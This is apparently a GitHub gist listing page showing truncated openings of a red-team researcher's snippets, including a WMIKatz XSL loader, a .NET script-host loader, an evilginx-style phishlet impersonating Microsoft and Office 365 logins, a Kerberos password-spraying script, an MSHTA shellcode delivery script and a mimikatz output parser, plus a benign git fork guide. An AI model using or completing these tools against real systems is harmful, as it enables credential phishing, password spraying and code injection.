Skip to content

Instantly share code, notes, and snippets.

View kafkaesqu3's full-sized avatar

David kafkaesqu3

81 followers · 124 following
View GitHub Profile
@kafkaesqu3
kafkaesqu3 / gist:06297cf754a144490ad6d77295dd9cdd
Created July 14, 2018 19:56
WMIKatz - Are you afraid
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
@kafkaesqu3
kafkaesqu3 / example.cs
Created October 29, 2018 03:44
Loads .NET Assembly into script host from current path
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@kafkaesqu3
kafkaesqu3 / abandonedInprocServer32.cs
Created November 1, 2018 19:18 — forked from matterpreter/abandonedInprocServer32.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
{
public class ComAbandonment
{
@kafkaesqu3
kafkaesqu3 / switch-local-git-repo-to-fork.md
Created November 14, 2018 02:50 — forked from jpierson/switch-local-git-repo-to-fork.md
How to move to a fork after cloning

If you are like me you find yourself cloning a repo, making some proposed changes and then deciding to later contributing back using the GitHub Flow convention. Below is a set of instructions I've developed for myself on how to deal with this scenario and an explanation of why it matters based on jagregory's gist.

To follow GitHub flow you should really have created a fork initially as a public representation of the forked repository and the clone that instead. My understanding is that the typical setup would have your local repository pointing to your fork as origin and the original forked repository as upstream so that you can use these keywords in other git commands.

  1. Clone some repo (you've probably already done this step)

    git clone [email protected]
@kafkaesqu3
kafkaesqu3 / office.yaml
Created November 30, 2018 23:20 — forked from ztxq/office.yaml
author: '@ztx'
min_ver: '2.2.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false}
- {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'office365.com', session: false, is_landing: false}
- {phish_sub: 'secure.aadcdn', orig_sub: 'secure.aadcdn', domain: 'microsoftonline-p.com', session: true, is_landing: false}
- {phish_sub: 'browser.pipe.aria', orig_sub: 'browser.pipe.aria', domain: 'microsoft.com', session: true, is_landing: false}
- {phish_sub: 'r4.res', orig_sub: 'r4.res', domain: 'office365.com', session: true, is_landing: false}
@kafkaesqu3
kafkaesqu3 / macchanger-onboot.txt
Last active January 22, 2019 20:48
macchanger configuration
root@kali:~# apt-get install macchanger
root@kali:~# systemctl disable network-manager
root@kali:~# cat /etc/default/macchanger
# before bringing up any network interface, run macchanger. Careful, this is
# not guaranteed to prevent leaking your real MAC address before the new one
# gets assigned!
#
ENABLE_ON_POST_UP_DOWN=false
@kafkaesqu3
kafkaesqu3 / kinit_user_brute.sh
Created March 19, 2019 02:28 — forked from ropnop/kinit_user_brute.sh
A quick script to perform horizontal password spraying against a user list by requesting TGTs from the DC with kinit
#!/bin/bash
# Title: kinit_user_brute.sh
# Author: @ropnop
# Description: This is a PoC for doing horiztonal password sprays using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
@kafkaesqu3
kafkaesqu3 / TestMSHTAShellcodeDelivery.ps1
Created April 12, 2019 12:26
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credtis for CACTUSTORCH HERE
I was in escape sequcence hell ;-)
' ( ) ( )
@kafkaesqu3
kafkaesqu3 / Inject.cs
Created July 12, 2019 16:56
DotNetToJScript Build Walkthrough
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
@kafkaesqu3
kafkaesqu3 / One-liner Mimikatz Parser
Created July 16, 2019 14:32 — forked from Raikia/One-liner Mimikatz Parser
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):